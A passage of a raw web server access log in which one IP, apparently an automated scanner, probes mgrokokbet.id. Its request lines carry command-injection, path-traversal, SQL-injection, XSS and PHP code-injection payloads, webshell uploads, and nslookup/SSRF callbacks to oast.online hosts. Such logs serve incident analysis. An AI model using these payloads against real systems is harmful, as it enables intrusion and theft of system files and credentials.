10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:01:50:16 -0400] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.18" 154.84.62.234 - - [24/Apr/2025:01:50:38 -0400] "GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:52:22 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:52:24 -0400] "PUT /fileserver/2w9rfXA74hzM3sdvSwa1RKbXlPB.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:52:25 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:52:29 -0400] "GET /fileserver/2w9rfXA74hzM3sdvSwa1RKbXlPB.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:01:52:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4" 154.84.62.234 - - [24/Apr/2025:01:54:09 -0400] "POST /RPC2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:01:54:16 -0400] "GET /__debugging_center_utils___.php?log=;echo%20asxeydlyfjkcpsjndtfihetbimbywnde%20|%20id HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:54:19 -0400] "GET /__debugging_center_utils___.php?log=;echo%20asxeydlyfjkcpsjndtfihetbimbywnde%20|%20ipconfig HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - maint [24/Apr/2025:01:56:27 -0400] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:56:27 -0400] "GET /webadmin/script?command=|%20nslookup%20d04qr7ij4pq19d75k4909ye16e5yq45hc.oast.online HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 
154.84.62.234 - - [24/Apr/2025:01:56:53 -0400] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:01:59:27 -0400] "GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:00:59 -0400] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:01:16 -0400] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:02:01:21 -0400] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:02:02:33 -0400] "POST / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) \x09\x09\x09Chrome/55.0.2883.95 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:02:33 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 154.84.62.234 - - [24/Apr/2025:02:03:30 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.27" 154.84.62.234 - - [24/Apr/2025:02:03:30 -0400] "GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.19" 154.84.62.234 - - [24/Apr/2025:02:03:31 -0400] "GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Kubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - maint [24/Apr/2025:02:05:09 -0400] "POST /maint/index.php?packages HTTP/1.1" 403 1242 "mgrokokbet.id/maint/index.php?packages" "Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - maint [24/Apr/2025:02:05:13 -0400] "GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1" 403 1242 "mgrokokbet.id/maint/index.php?packages" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:05:21 -0400] "PUT /2w9rfWquy9kFPaj51G8DGd9t3Rj.jsp/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:02:05:22 -0400] "PUT /poc.jsp/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/616.20 (KHTML, like Gecko) Version/17.1.83 Safari/616.20" 154.84.62.234 - - [24/Apr/2025:02:05:27 -0400] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:02:05:27 -0400] "GET /2w9rfWquy9kFPaj51G8DGd9t3Rj.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:02:11:51 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:02:12:00 -0400] "GET /2w9rfcUs4eBDEWLLJWHRcZPAdDr.php%5Cx0A HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.17" 154.84.62.234 - - [24/Apr/2025:02:15:05 -0400] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; 
Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:15:09 -0400] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:15:15 -0400] "POST /invoker/readonly HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 199.168.98.202 - - [24/Apr/2025:02:23:21 -0400] "GET /about.php?ac=u_h_s_1&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [24/Apr/2025:02:26:06 -0400] "GET /640275/about.php?ac=u_h_s_1&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:27:48 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:28:37 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:02:31:25 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:02:31:26 -0400] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:02:31:44 -0400] "GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:31:45 -0400] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://d04qr7ij4pq19d75k4908uog1ij7wmduo.oast.online HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:02:32:05 -0400] "POST /integration/saveGangster.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:02:33:21 -0400] "GET /__ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" 154.84.62.234 - - [24/Apr/2025:02:33:58 -0400] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" 154.84.62.234 - - [24/Apr/2025:02:33:58 -0400] "POST /cobbler_api HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:34:24 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:02:36:59 -0400] "POST /nagiosql/admin/logbook.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:02:36:59 -0400] "POST /nagiosql/admin/menuaccess.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:02:39:16 -0400] "POST /admin/index.php?id=pages HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:39:23 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 
Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:02:39:26 -0400] "POST /clients/editclient.php?id=2w9rffcmJEWozzaI97eDWShIkYl&action=update HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/618.5.10 (KHTML, like Gecko) Version/17.5 Safari/618.5.10" 154.84.62.234 - - [24/Apr/2025:02:39:29 -0400] "GET /hw-sys.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:02:39:34 -0400] "GET /logos_clients/2w9rffcmJEWozzaI97eDWShIkYl.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:39:37 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:02:40:00 -0400] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:41:33 -0400] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" 154.84.62.234 - - [24/Apr/2025:02:41:38 -0400] "POST /orders/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:02:42:49 -0400] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.18" 154.84.62.234 - - [24/Apr/2025:02:42:54 -0400] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 66.249.79.167 - - [24/Apr/2025:02:43:13 -0400] "GET /robots.txt HTTP/1.1" 200 62 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; 
+http://www.google.com/bot.html)" 154.84.62.234 - - [24/Apr/2025:02:43:10 -0400] "POST /modules/attributewizardpro/file_upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.16" 66.249.79.167 - - [24/Apr/2025:02:43:14 -0400] "GET /.well-known/assetlinks.json HTTP/1.1" 200 38753 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 154.84.62.234 - - [24/Apr/2025:02:44:14 -0400] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:02:45:15 -0400] "POST /account HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.2.20" 154.84.62.234 - - [24/Apr/2025:02:45:15 -0400] "POST /account HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:02:45:15 -0400] "POST /system/sharedir.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:02:45:18 -0400] "POST /en/php/usb_sync.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:47:14 -0400] "POST /filemanager/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15-620" 154.84.62.234 - - [24/Apr/2025:02:47:24 -0400] "POST /fcgi-bin/wgsetcgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0" 154.84.62.234 - - [24/Apr/2025:02:47:38 -0400] "PUT /meta HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, 
like Gecko) Version/17.4.1 Safari/605.1.22" 154.84.62.234 - - [24/Apr/2025:02:48:31 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:49:29 -0400] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:02:49:29 -0400] "POST /upload HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:49:39 -0400] "GET /users/registration HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.23" 154.84.62.234 - - [24/Apr/2025:02:50:07 -0400] "POST /web/google_analytics.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:51:46 -0400] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 403 1242 "https://mgrokokbet.id" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:55:18 -0400] "GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login&CipheredValue HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:02:55:23 -0400] "GET /session/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/106.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:55:27 -0400] "POST /wp-admin/admin.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:02:55:47 -0400] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:55:56 -0400] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2w9rffei5NLr6JIePFYp5VLmp2z.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.27" 154.84.62.234 - - [24/Apr/2025:02:56:04 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.21" 154.84.62.234 - - [24/Apr/2025:03:01:43 -0400] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:03:01:49 -0400] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:03:07:04 -0400] "GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:07:08 -0400] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) 
Version/17.1.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:08:01 -0400] "POST /XMLCHART HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:10:18 -0400] "GET / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:10:22 -0400] "GET / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:12:26 -0400] "POST /OA_HTML/lcmServiceController.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:13:46 -0400] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:14:43 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.17" 154.84.62.234 - - [24/Apr/2025:03:14:44 -0400] "POST /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063" 154.84.62.234 - - [24/Apr/2025:03:14:53 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.25" 154.84.62.234 - - [24/Apr/2025:03:14:54 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:03:15:10 -0400] "POST /login.php HTTP/1.1" 200 
0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:03:15:12 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:03:15:15 -0400] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:15:18 -0400] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:15:21 -0400] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 154.84.62.234 - - [24/Apr/2025:03:15:24 -0400] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:15:27 -0400] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:03:15:26 -0400] "POST /php/upload.php HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:15:32 -0400] "GET /Uploads/2w9rfRzQbJbYxgej9ol3tRMFU9V.php7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:15:58 -0400] "POST 
